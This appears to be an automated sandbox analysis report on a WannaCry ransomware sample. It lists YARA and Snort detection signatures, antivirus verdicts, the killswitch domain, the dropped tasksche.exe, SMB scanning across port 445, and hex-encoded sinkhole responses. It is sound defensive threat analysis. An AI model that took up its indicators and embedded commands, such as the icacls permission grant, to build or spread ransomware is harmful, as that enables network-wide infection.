1.2.stN592INV6.exe.1feb104.2.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0x2dcfc:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0x2dd24:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
Click to see the 105 entries

Snort Signatures

ET TROJAN W32/WannaCry.Ransomware Killswitch Domain HTTP Request 1 - Source IP: 192.168.2.6 - Destination IP: 104.16.173.80

Timestamp:	192.168.2.6104.16.173.8049705802024298 05/08/23-05:35:39.911846
SID:	2024298
Source Port:	49705
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible WannaCry DNS Lookup 1 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.849786532024291 05/08/23-05:35:39.859181
SID:	2024291
Source Port:	49786
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Possible WannaCry DNS Lookup 1 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.859575532024291 05/08/23-05:35:38.893922
SID:	2024291
Source Port:	59575
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Known Sinkhole Response Kryptos Logic - Source IP: 104.16.173.80 - Destination IP: 192.168.2.6

Timestamp:	104.16.173.80192.168.2.680497042031515 05/08/23-05:35:39.010206
SID:	2031515
Source Port:	80
Destination Port:	49704
Protocol:	TCP
Classtype:	Misc activity

ET TROJAN Known Sinkhole Response Kryptos Logic - Source IP: 104.16.173.80 - Destination IP: 192.168.2.6

Timestamp:	104.16.173.80192.168.2.680497052031515 05/08/23-05:35:39.944324
SID:	2031515
Source Port:	80
Destination Port:	49705
Protocol:	TCP
Classtype:	Misc activity

ET TROJAN W32/WannaCry.Ransomware Killswitch Domain HTTP Request 1 - Source IP: 192.168.2.6 - Destination IP: 104.16.173.80

Timestamp:	192.168.2.6104.16.173.8049704802024298 05/08/23-05:35:38.979066
SID:	2024298
Source Port:	49704
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: stN592INV6.exe

ReversingLabs: Detection: 100%

Antivirus / Scanner detection for submitted sample

Source: stN592INV6.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com	URL Reputation: Label: malware
Source: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/	URL Reputation: Label: malware
Source: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/22www.iuqerfsodp9ifjaposdfjhgosurijfaewrwer	URL Reputation: Label: malware
Source: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/&h	Avira URL Cloud: Label: malware
Source: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/2h	Avira URL Cloud: Label: malware
Source: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/L	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Windows\tasksche.exe

Avira: detection malicious, Label: TR/AD.WannaCry.sewvt

Multi AV Scanner detection for dropped file

Source: C:\Windows\tasksche.exe

ReversingLabs: Detection: 97%

Machine Learning detection for sample

Source: stN592INV6.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Source: C:\Windows\tasksche.exe

Joe Sandbox ML: detected

Source: 2.2.tasksche.exe.400000.0.unpack	Avira: Label: TR/AD.WannaCry.sewvt
Source: 0.2.stN592INV6.exe.7100a4.1.unpack	Avira: Label: TR/AD.WannaCry.sewvt
Source: 0.0.stN592INV6.exe.7100a4.1.unpack	Avira: Label: TR/AD.WannaCry.sewvt
Source: 1.0.stN592INV6.exe.7100a4.1.unpack	Avira: Label: TR/AD.WannaCry.sewvt
Source: 0.2.stN592INV6.exe.400000.0.unpack	Avira: Label: TR/AD.WannaCry.sewvt
Source: 0.0.stN592INV6.exe.400000.0.unpack	Avira: Label: TR/AD.WannaCry.sewvt
Source: 1.2.stN592INV6.exe.24fc8c8.9.unpack	Avira: Label: TR/Ransom.Gen
Source: 1.0.stN592INV6.exe.400000.0.unpack	Avira: Label: TR/AD.WannaCry.sewvt
Source: 2.0.tasksche.exe.400000.0.unpack	Avira: Label: TR/AD.WannaCry.sewvt
Source: 1.2.stN592INV6.exe.7100a4.1.unpack	Avira: Label: TR/AD.WannaCry.sewvt
Source: 1.2.stN592INV6.exe.252e96c.6.unpack	Avira: Label: TR/AD.WannaCry.sewvt
Source: 1.2.stN592INV6.exe.1fdc084.5.unpack	Avira: Label: TR/Ransom.Gen
Source: 1.2.stN592INV6.exe.200e128.3.unpack	Avira: Label: TR/AD.WannaCry.sewvt
Source: 1.2.stN592INV6.exe.400000.0.unpack	Avira: Label: TR/AD.WannaCry.sewvt

Source: C:\Windows\tasksche.exe

Code function: 2_2_004018B9 CryptReleaseContext,

2_2_004018B9

Exploits

Connects to many different private IPs (likely to spread or exploit)

Source: global traffic	TCP traffic: 192.168.2.39:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.38:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.42:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.41:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.44:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.43:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.46:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.45:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.48:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.47:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.40:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.28:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.27:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.29:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.31:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.30:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.33:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.32:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.35:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.34:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.37:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.36:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.17:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.16:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.19:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.18:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.20:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.22:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.21:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.24:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.23:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.26:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.25:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.97:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.96:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.11:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.99:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.10:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.98:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.13:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.12:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.15:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.14:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.91:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.90:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.93:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.92:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.95:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.94:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.2:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.1:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.8:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.7:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.9:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.4:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.3:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.6:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.5:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.86:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.104:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.85:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.105:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.88:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.102:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.87:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.103:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.108:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.89:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.109:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.106:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.107:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.80:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.82:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.100:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.81:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.101:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.84:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.83:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.75:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.115:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.74:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.116:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.77:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.113:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.76:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.114:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.79:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.119:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.78:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.117:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.118:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.71:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.111:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.70:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.112:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.73:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.72:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.110:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.64:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.63:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.66:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.65:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.68:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.67:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.69:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.60:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.62:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.61:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.49:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.53:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.52:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.55:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.54:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.57:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.56:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.59:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.58:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.51:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.50:445	Jump to behavior

Connects to many different private IPs via SMB (likely to spread or exploit)

Source: global traffic	TCP traffic: 192.168.2.39:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.38:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.42:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.41:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.44:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.43:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.46:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.45:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.48:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.47:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.40:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.28:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.27:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.29:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.31:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.30:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.33:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.32:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.35:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.34:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.37:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.36:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.17:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.16:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.19:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.18:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.20:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.22:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.21:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.24:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.23:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.26:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.25:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.97:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.96:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.11:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.99:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.10:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.98:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.13:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.12:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.15:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.14:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.91:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.90:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.93:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.92:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.95:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.94:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.2:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.1:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.8:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.7:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.9:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.4:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.3:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.6:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.5:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.86:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.104:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.85:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.105:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.88:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.102:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.87:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.103:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.108:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.89:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.109:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.106:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.107:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.80:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.82:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.100:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.81:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.101:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.84:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.83:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.75:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.115:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.74:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.116:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.77:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.113:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.76:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.114:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.79:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.119:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.78:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.117:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.118:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.71:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.111:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.70:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.112:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.73:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.72:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.110:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.64:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.63:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.66:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.65:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.68:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.67:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.69:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.60:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.62:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.61:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.49:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.53:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.52:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.55:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.54:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.57:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.56:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.59:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.58:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.51:445	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.50:445	Jump to behavior

Source: stN592INV6.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Networking

Tries to download HTTP data from a sinkholed server

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 08 May 2023 03:35:38 GMTContent-Type: text/htmlContent-Length: 607Connection: closeServer: cloudflareCF-RAY: 7c3ea7649c729b63-FRAData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 53 69 6e 6b 68 6f 6c 65 64 20 62 79 20 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 20 53 69 6e 6b 68 6f 6c 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 73 74 61 74 69 63 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 73 69 6e 6b 68 6f 6c 65 2e 63 6f 6d 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 66 6c 61 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 62 6f 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 69 67 2d 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 22 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 68 31 3e 53 69 6e 6b 68 6f 6c 65 64 21 3c 2f 68 31 3e 3c 70 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 68 61 73 20 62 65 65 6e 20 73 69 6e 6b 68 6f 6c 65 64 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 2e 63 6f 6d 22 3e 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 61 3e 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html lang="en-us" class="no-js"><head><meta charset="utf-8"><title>Sinkholed by Kryptos Logic</title><meta name="description" content="Kryptos Logic Sinkhole"><meta name="viewport" content="width=device-width, initial-scale=1.0"><link href="//static.kryptoslogicsinkhole.com/style.css" rel="stylesheet" type="text/css"/></head><body class="flat"><div class="content"><div class="content-box"><div class="big-content"><div class="clear"></div></div><h1>Sinkholed!</h1><p>This domain has been sinkholed by <a href="https://www.kryptoslogic.com">Kryptos Logic</a>.</p></div></div></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 08 May 2023 03:35:39 GMTContent-Type: text/htmlContent-Length: 607Connection: closeServer: cloudflareCF-RAY: 7c3ea76a6c8b371f-FRAData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 53 69 6e 6b 68 6f 6c 65 64 20 62 79 20 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 20 53 69 6e 6b 68 6f 6c 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 73 74 61 74 69 63 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 73 69 6e 6b 68 6f 6c 65 2e 63 6f 6d 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 66 6c 61 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 62 6f 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 69 67 2d 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 22 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 68 31 3e 53 69 6e 6b 68 6f 6c 65 64 21 3c 2f 68 31 3e 3c 70 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 68 61 73 20 62 65 65 6e 20 73 69 6e 6b 68 6f 6c 65 64 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 2e 63 6f 6d 22 3e 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 61 3e 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html lang="en-us" class="no-js"><head><meta charset="utf-8"><title>Sinkholed by Kryptos Logic</title><meta name="description" content="Kryptos Logic Sinkhole"><meta name="viewport" content="width=device-width, initial-scale=1.0"><link href="//static.kryptoslogicsinkhole.com/style.css" rel="stylesheet" type="text/css"/></head><body class="flat"><div class="content"><div class="content-box"><div class="big-content"><div class="clear"></div></div><h1>Sinkholed!</h1><p>This domain has been sinkholed by <a href="https://www.kryptoslogic.com">Kryptos Logic</a>.</p></div></div></body></html>

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2024291 ET TROJAN Possible WannaCry DNS Lookup 1 192.168.2.6:59575 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024298 ET TROJAN W32/WannaCry.Ransomware Killswitch Domain HTTP Request 1 192.168.2.6:49704 -> 104.16.173.80:80
Source: Traffic	Snort IDS: 2031515 ET TROJAN Known Sinkhole Response Kryptos Logic 104.16.173.80:80 -> 192.168.2.6:49704
Source: Traffic	Snort IDS: 2024291 ET TROJAN Possible WannaCry DNS Lookup 1 192.168.2.6:49786 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024298 ET TROJAN W32/WannaCry.Ransomware Killswitch Domain HTTP Request 1 192.168.2.6:49705 -> 104.16.173.80:80
